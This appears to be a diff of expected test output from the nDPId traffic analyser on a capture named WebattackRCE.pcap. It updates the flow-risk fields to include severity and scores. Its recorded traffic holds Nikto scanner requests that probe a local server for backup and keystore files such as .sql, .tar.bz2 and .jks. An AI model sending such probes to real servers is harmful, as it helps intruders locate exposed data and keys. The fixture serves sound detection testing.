 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277301,"pkt":"AAAAAAAAAAAAAAAACABFAADAvp1AAEAGfZh\/AAABfwAAAcSgH5BBBoY3\/wT40oAYAED+tAAAAQEICp1m\/V2dZv1dR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420277302,"pkt":"AAAAAAAAAAAAAAAACABFAADG+c1AAEAGQmJ\/AAABfwAAAcSiH5Dkc8Fn99puBYAYAED+ugAAAQEICp1m\/V6dZv1eR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420277304,"pkt":"AAAAAAAAAAAAAAAACABFAADGn2FAAEAGnM5\/AAABfwAAAcSkH5ABoKfybJgPqoAYAED+ugAAAQEICp1m\/WCdZv1gR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277306,"pkt":"AAAAAAAAAAAAAAAACABFAADBq8lAAEAGkGt\/AAABfwAAAcSmH5B085NqCLeHfoAYAED+tQAAAQEICp1m\/WGdZv1hR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277307,"pkt":"AAAAAAAAAAAAAAAACABFAADBE+BAAEAGKFV\/AAABfwAAAcSoH5A\/FCtx8eapa4AYAED+tQAAAQEICp1m\/WOdZv1jR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277308,"pkt":"AAAAAAAAAAAAAAAACABFAADBd5tAAEAGxJl\/AAABfwAAAcSqH5Asxk83LE5RU4AYAED+tQAAAQEICp1m\/WSdZv1kR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277309,"pkt":"AAAAAAAAAAAAAAAACABFAADB9HRAAEAGR8B\/AAABfwAAAcSsH5BlTMzeEpcpJ4AYAED+tQAAAQEICp1m\/WWdZv1lR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277310,"pkt":"AAAAAAAAAAAAAAAACABFAADFcQdAAEAGyyl\/AAABfwAAAcSuH5C\/jUmrZ8IhxYAYAED+uQAAAQEICp1m\/WadZv1mR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
